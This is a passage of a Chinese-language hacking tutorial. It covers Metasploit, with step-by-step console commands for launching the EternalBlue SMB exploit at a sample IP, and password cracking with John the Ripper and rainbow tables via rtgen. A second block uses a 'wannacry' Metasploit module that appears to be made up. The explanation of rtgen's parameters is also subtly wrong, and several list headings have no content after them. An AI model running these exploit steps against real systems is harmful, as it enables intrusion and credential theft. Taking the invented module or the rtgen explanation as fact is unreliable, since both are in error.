Metasploit 是系統入侵的重要工具。它是一個開源的漏洞利用框架,包含了大量已知漏洞的利用模組。Metasploit 可以用來進行系統入侵的各個階段,包括漏洞掃描、漏洞利用、後滲透操作等。
Metasploit 的優點包括:
Metasploit 通常被用於以下情況:
永恆之藍
# 啟動 Metasploit
msfconsole
# 搜索 EternalBlue 模塊
msf6> search eternalblue
# 選擇要使用的模塊
msf6> use exploit/windows/smb/ms17_010_eternalblue
# 配置模塊選項
msf6> set RHOST 192.168.1.100
# 運行模塊
msf6> exploit
想哭
# 啟動 Metasploit
msfconsole
# 搜索想哭病毒模塊
msf6> search wannacry
# 選擇要使用的模塊
msf6> use exploit/windows/smb/wannacry
# 配置模塊選項
msf6> set RHOST 192.168.1.100
# 運行模塊
msf6> exploit
搜索 www.exploit-db.com 以查找與漏洞相關的漏洞利用。例如,我們正在使用 Eternal Blue 漏洞利用,我們知道它在 Metasploit 中具有模塊。我們可以搜索 www.exploit-db.com 以查找與 Eternal Blue 漏洞相關的模塊。
John the Ripper 可以用三種不同的模式來破解密碼:字典模式、遞增模式和混合模式。
字典模式 是最簡單的模式,John 會將字典中的每個單詞與密碼哈希值進行比較。此模式對弱密碼有效,但無法破解不在字典中的密碼。
遞增模式 是最徹底的模式,John 會嘗試所有可能的字符組合,直到找到匹配項。此模式對強密碼有效,但可能需要很長時間才能完成,尤其是對於長密碼。
混合模式 是字典模式和遞增模式的組合。John 首先會將字典中的單詞與密碼哈希值進行比較。如果沒有找到匹配項,它就會嘗試遞增模式。混合模式是速度和效果之間的一種折衷。
john passwords.txt
破解密碼時使用 John the Ripper 的技巧
彩虹表(Rainbow Tables)是一種用於提前計算密碼雜湊的方法,以便在破解密碼時節省時間和計算資源。對每個密碼使用John the Ripper等工具進行測試時,都需要計算相應的雜湊值以進行比對,這需要時間和計算能力。在當今的處理器下,這個時間和計算能力可能不是一個大問題,但它們會累積。對於數百萬個單詞而言,每個單詞的微秒數都會增加時間。因此,更容易的方法是在運行檢查之前預先計算這些雜湊。這樣,您只需要在索引中查找雜湊並檢索用於創建該雜湊的純文本。所有耗時的工作都在您需要破解密碼之前完成。當然,這也存在一個權衡。預先計算雜湊意味著您需要在某處存儲它們,而這些預先計算的雜湊就是彩虹表。
彩虹表不僅僅是一個將雜湊和密碼之間的映射,它們以鏈的形式存儲,以限制存儲的純文本密碼數量。在某些情況下,如果純文本密碼未直接存儲,則可以通過推斷來獲得它。有許多工具可以用來從這些表中查找密碼,但首先我們需要這些表。
Rainbow Crack項目提供了一個查找密碼的工具,以及一個創建彩虹表的工具。這個創建工具不是用於從單詞列表生成雜湊的,而是將根據提供的約束條件生成所有可能的密碼值的雜湊。在下面的代碼中,您將看到使用**rtgen
**生成彩虹表的示例。
rtgen md5 loweralpha-numeric 5 8 0 3800
這個命令 rtgen md5 loweralpha-numeric 5 8 0 3800
用於生成一個MD5哈希彩虹表
rtgen
是用於生成彩虹表的工具。md5
表示要生成的彩虹表將使用MD5哈希算法進行計算。loweralpha-numeric
是字符集,它指定了用於生成密碼的字符集。在這個字符集中包括小寫字母(a-z)和數字(0-9)。這表示生成的密碼將由小寫字母和數字組成。5
是彩虹表中每個密碼的最小長度。在這種情況下,密碼的最小長度為5個字符。8
是彩虹表中每個密碼的最大長度。在這種情況下,密碼的最大長度為8個字符。0
是種子(seed),通常用於確保生成的彩虹表是唯一的。在這個示例中,種子設置為0,表示不使用特定的種子。3800
是要生成的彩虹表的鏈(chain)數量。彩虹表的性能和大小與鏈的數量有關,更多的鏈意味著更大的彩虹表,但也需要更多的存儲空間。在這個示例中,生成的彩虹表將包含3800條鏈。